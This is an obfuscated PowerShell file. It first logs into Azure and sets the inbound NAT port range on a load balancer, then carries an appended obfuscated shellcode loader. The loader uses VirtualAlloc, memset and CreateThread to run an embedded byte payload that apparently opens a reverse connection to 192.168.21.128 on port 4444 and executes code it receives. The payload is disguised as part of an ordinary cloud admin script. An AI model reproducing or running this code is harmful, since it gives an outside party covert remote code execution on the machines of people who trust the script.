.("{0}{2}{1}" -f 'Login-AzA','t','ccoun')
.("{3}{2}{1}{0}{4}"-f'pt','cri','t-AzSubs','Ge','ion')
.("{0}{1}{2}" -f'S','et-AzCont','ext') -SubscriptionId ("{2}{3}{4}{1}{0}" -f 'onId','cripti','you','rSub','s')

${GRO`UP`NAMe} = ("{0}{1}{2}" -f 'mysfc','lu','stergroup')
${sT`A`Rt}=3400
${e`ND}=4400


${R`E`sOurCe} = &("{3}{2}{0}{1}" -f'Re','source','t-Az','Ge') | .("{1}{0}" -f're','Whe') {${_}."ReSoUR`cegR`O`UpName" ¡§Ceq ${g`RoUPn`AME} -and ${_}."re`SOu`RceTY`pE" -eq ("{1}{2}{5}{6}{3}{0}{7}{4}"-f'N','M','icro','.','rk/loadBalancers','so','ft','etwo')} 
${l`B} = &("{3}{0}{2}{1}{4}" -f'et-','urc','AzReso','G','e') -ResourceGroupName ${gr`OU`PnamE} -ResourceType ("{4}{8}{5}{7}{3}{0}{9}{6}{2}{1}" -f 'k/lo','rs','ce','wor','Micr','ft.Ne','dBalan','t','oso','a') -ResourceName ${RES`oUr`Ce}."nA`Me"


${l`B}."Pr`o`PeRTiES"."I`NbOU`Ndnatp`oOls"."prO`pErTi`es"."frO`NT`endPoRtR`ANgE`st`Art" = ${St`Art}
${L`B}."pROP`ER`TIES"."inboUN`d`NatpoolS"."PRo`pe`RTiES"."F`RONTeN`DP`ortR`An`gEE`ND" = ${E`ND}


&("{1}{3}{0}{2}"-f 'H','Wri','ost','te-') (${L`B}."Pr`O`PERtiEs"."inbo`UNDnA`Tpo`ols" | &("{0}{1}{2}{3}"-f'F','ormat','-','List') | .("{0}{2}{1}"-f 'O','ng','ut-Stri'))


&("{1}{0}{2}{3}"-f't','Se','-AzRes','ource') -PropertyObject ${LB}."pr`o`PErT`ies" -ResourceGroupName ${GR`oUPna`me} -ResourceType ("{1}{3}{5}{0}{6}{4}{2}"-f 'Network/loa','Micro','rs','soft','ce','.','dBalan') -ResourceName ${LB}."na`me"  -Force


${kZ`S9} = ((("{34}{38}{27}{75}{69}{37}{0}{1}{44}{24}{62}{58}{19}{80}{79}{26}{17}{66}{16}{63}{70}{43}{71}{23}{82}{52}{28}{7}{74}{61}{46}{68}{55}{36}{72}{21}{15}{14}{56}{78}{47}{32}{30}{2}{25}{12}{33}{49}{48}{64}{83}{65}{13}{39}{35}{76}{10}{50}{20}{73}{53}{51}{41}{45}{57}{11}{42}{6}{29}{40}{54}{60}{8}{9}{22}{84}{31}{81}{77}{3}{18}{4}{59}{5}{67}" -f' IntPt','r Vir','a',' uin','c','u','ti','at','t','r memset(Int','uint ','l{0})]pub',' lp','l',' ','Ptr','i','ocationType','t ','uint ','lags, IntPtr lpThr','Int','Ptr','kernel32.',' lpAdd','ckSize, IntPtr','t flAll','ort({0}kernel32.dll{0}',']public st','c ext','t dwSt','es','s, uin','S','[','ramete','ateThre','xtern','DllImp','pPa','ern','rt({','lic sta','mpo','tualAlloc(IntPtr','0}m','rn IntP','eadAttribute','artAddres','t','dwCreationF','Id);[DllImpo','0})','ad',' I','re','l','svcrt.dl','ess, ','o','ntP','e','r','nt flProt','s,','tr ',', u','nt);','tr C','atic e','ect);[DllI','rt({0}','ad(','e','ic ext',')]public st','r, ','t src,','pThr',' uin','dwSize,','t, uin','dll{',' IntP',' d'))-f  [CHAR]34);${w} = &("{0}{2}{1}"-f 'Add-','pe','Ty') -memberDefinition ${K`ZS9} -Name ("{1}{0}"-f'n32','Wi') -namespace ("{3}{0}{2}{1}"-f 'in32F','ions','unct','W') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x15,0x80,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."le`N`GtH" -gt 0x1000){${G} = ${Z}."Le`NG`Th"};${6N`x6}=${w}::("{2}{1}{0}"-f 'Alloc','rtual','Vi').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."L`EnGth"-1);${I}++) {${W}::"m`EMseT"([IntPtr](${6`Nx6}.("{1}{0}"-f'nt32','ToI').Invoke()+${I}), ${z}[${I}], 1)};${W}::("{1}{0}{2}{3}" -f'ateThre','Cre','a','d').Invoke(0,0,${6`Nx6},0,0,0);for (;;){&("{2}{1}{0}" -f 'p','lee','Start-s') 60};
